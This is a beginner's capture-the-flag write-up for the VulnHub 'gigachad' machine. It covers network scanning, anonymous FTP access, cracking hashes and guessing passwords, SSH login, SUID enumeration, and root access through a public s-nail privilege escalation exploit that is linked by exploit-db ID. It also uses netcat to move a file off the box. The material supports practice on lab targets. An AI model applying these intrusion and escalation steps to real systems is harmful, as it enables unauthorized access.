CTF-gigachad
Discovery
link: vulnhub-GAGACHAD
The only information we have it’s there is multiple flags.
Discovery and Scanning
netdiscover
Fast scan with netdiscover.
1 | sudo netdiscover -r 192.168.0.0/16 |
1 | _____________________________________________________________________________ |
nmap
1 | sudo nmap -sV -p- 192.168.0.19 |
1 | Nmap scan report for 192.168.0.19 |
We have the port 21, 22 and 80 open and it’s a debian machine.
port 80
Let’s to to http://192.168.0.19 and see what I can find.
With the inspector(F12) I found a key:A7F9B77C16A3AA80DAA4E378659226F628326A95 D82D10564866FD9B201941BCC6C94022196F8EE8
Dirbuster
I run a dirbuster with a common wordlist.dirbuster -u http://192.168.0.19/ -l Wordlist-common.txt
Oh… I found 500 directories, I stop the scan, it’s useless
Hash
Is an SHA-1 hash:
a7f9b77c16a3aa80daa4e378659226f628326a95 = fuck you
D82D10564866FD9B201941BCC6C94022196F8EE8 = VIRGIN
Maybe it’s a password or a user.
I got all what I need so I can go to the FTP part.
port 21
ftp 192.168.0.19
bash: ftp : commande introuvable
oh, I use arch BTW (and I’m french)sudo pacman -S inetutils
Now we can play.ftp 192.168.0.19
user: anonymous
password: password
1 | 230 Login successful. |
I’m in, let’s see what we can have with ls.
1 | -r-xr-xr-x 1 1000 1000 297 Feb 07 17:33 chadinfo |
Good, I have to read it.
Download: ftp>get chadinfo
Read: cat chadinfo
1 | PK |
User: chad
Password: in the image drippinchad.png
http://192.168.0.19/drippinchad.png
I will use google image to see where is it.
It’s maiden's tower it should be the password.
After multiples attempts the password is maidenstower
I’m connected as chad:
we have the directory ftp with the chadinfo,
and also user.txt.
I download and read it.
1 | flag 1/2 |
Nice, I think I’m done with the ftp, I go to sleep I will continue tomorrow.
Port 22
I’m back.
I will try to connect to ssh with previous creds:
User: chad
Password: maidenstower
1 | ssh [email protected] |
I’m in!
I am in his home directory, I will display what’s in:
ls -la
1 | drwxr-xr-x 4 chad chad 4096 Jul 16 06:51 . |
.gnupg seem intresting
I have the directory private-keys-v1.d, but it’s empty.
Vulnerability Assessment
Find perms
Hausec pentest-cheatsheep
Find Binaries that will execute as the owner:find / -perm -u=s -type f 2>/dev/null
This is what I found:
1 | /usr/lib/openssh/ssh-keysign |
s-nail look instresting:s-nail -V v14.8.6
Exploit
I found this on exploit database:
S-nail < 14.8.16 - Local Privilege Escalation
14.8.6 = 14.8.60 or 14.8.06 ?
Let’s try it.
touch exploit.shvi exploit.sh
Past this: https://www.exploit-db.com/raw/47172
Escape, :wq.chmod + x exploit.sh./exploit.sh
Result:
1 | [-] Failed. Not vulnerable? |
This is the only exploit on exploit database, what I did wrong?
I’m trying to download the file in the chad machine but the terminal is so buggy.
I will use scp to give him the file.scp 47172.sh [email protected]:/tmp/exploit.sh
Type the password: maidenstower
I have to run is with bash because ./ don’t work, and I have too much errors now.
I think the machine is broken or maybe my shell,
I have some errors and it’s my first CTF with this machine.
I fixed it with this here.
So let’s run the script and fail again, so I spamed it and I’m in!
I will change my shell /bin/bash.
I’m roo so let’s see what is in /root/ directory.
1 | # cat root.txt |
Nice, the CTF is over, it was easy.
There is an image, I will download it:
Receiver machine: nc -l -p 1234 > chad.png
Sender machine: nc -w 192.168.0.16 < chad.png
This is the end, I hope you liked it, it was my first writeup.